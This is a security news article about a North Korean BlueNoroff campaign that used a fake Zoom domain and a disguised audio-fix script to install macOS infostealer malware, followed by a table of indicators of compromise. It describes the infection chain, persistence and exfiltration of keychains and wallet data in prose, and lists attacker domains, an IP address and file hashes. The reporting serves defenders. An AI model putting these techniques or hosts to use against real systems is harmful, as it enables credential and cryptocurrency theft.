BlueNoroff Hackers Exploit Zoom App to Deploy Infostealer Malware in Targeted Attacks
The Field Effect Analysis team has uncovered a targeted social engineering campaign orchestrated by the North Korean state-sponsored threat actor BlueNoroff, a financially motivated subgroup of the notorious Lazarus Group.
A Canadian online gambling provider fell victim to a meticulously crafted attack involving impersonation of a trusted contact and the Zoom platform.
Sophisticated Social Engineering Campaign
The attacker leveraged a spoofed domain, zoom-tech[.]us, to deceive the victim during a scheduled cryptocurrency-related Zoom meeting.
By exploiting audio issues as a pretext, the threat actor coerced the victim into running a malicious script disguised as a Zoom audio repair tool.
According to the Report, this script, laced with hidden commands among 10,000 blank lines, initiated a chain of events that downloaded infostealer malware, ultimately compromising sensitive data including user credentials and browser profiles.
The infection chain employed by BlueNoroff showcases a blend of technical finesse and psychological manipulation.
The initial script redirected the victim to the fraudulent domain zoom-tech[.]us, registered on April 14, 2025, using deceptive WHOIS data tied to multiple similar domains.
Malware Deployment
Once executed, the script invoked shell commands via curl and zsh to download secondary payloads, including a credential-harvesting component that exfiltrated the victim’s local account password.
Subsequent stages involved deploying a persistent malware implant via a LaunchDaemon configuration, ensuring boot-time execution with elevated privileges.
The malware, masquerading as legitimate macOS components like “Wi-Fi Updater,” featured process injection capabilities through specific entitlements, allowing it to attach to other processes.
Data-stealing routines were executed in parallel, rapidly collecting and exfiltrating keychain files, browser data (focusing on cryptocurrency wallet extensions in browsers like Brave), and system reconnaissance outputs using tools like rsync and curl.
The use of temporary directories and anti-forensic techniques, such as file deletion post-execution, minimized the attacker’s footprint, while domains like ajayplamingo[.]com and zmwebsdk[.]com facilitated command-and-control (C2) and data egress.
The campaign, traced back to at least March 2025, reflects BlueNoroff’s evolving tradecraft, targeting the cryptocurrency ecosystem with a focus on financial gain across regions like North America, South Korea, Japan, and Europe.
Organizations are urged to monitor for these indicators, restrict unauthorized script execution, and educate users on social engineering tactics to counter such advanced threats.
Indicators of Compromise (IoCs)
| Type | Indicator | Details |
|---|---|---|
| Binary | /Library/RestoreKey/com.apple.siri.updater | SHA256: 036CA0A9D6A87E811F96F3AAADD8D0506954716CDB3B56915FC20859F1363C2F |
| Binary | /Users//Library/com.apple.wifi.updater/Wi-Fi Updater.app/Contents/MacOS/Wi-Fi Updater | SHA256: CCF7F7678965105142F6878D7B1F1F1C6F31FDBC45B0E50B8E70D0441F0B7472 |
| C2 Domain | zoom-tech[.]us | Used for initial payload delivery and data exfiltration |
| C2 Domain | ajayplamingo[.]com | Used for malware implant C2 communication |
| C2 Domain | zmwebsdk[.]com | Used for data exfiltration |
| IP Address | 23.254.203[.]244 | Associated with C2 communications |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates
Source link
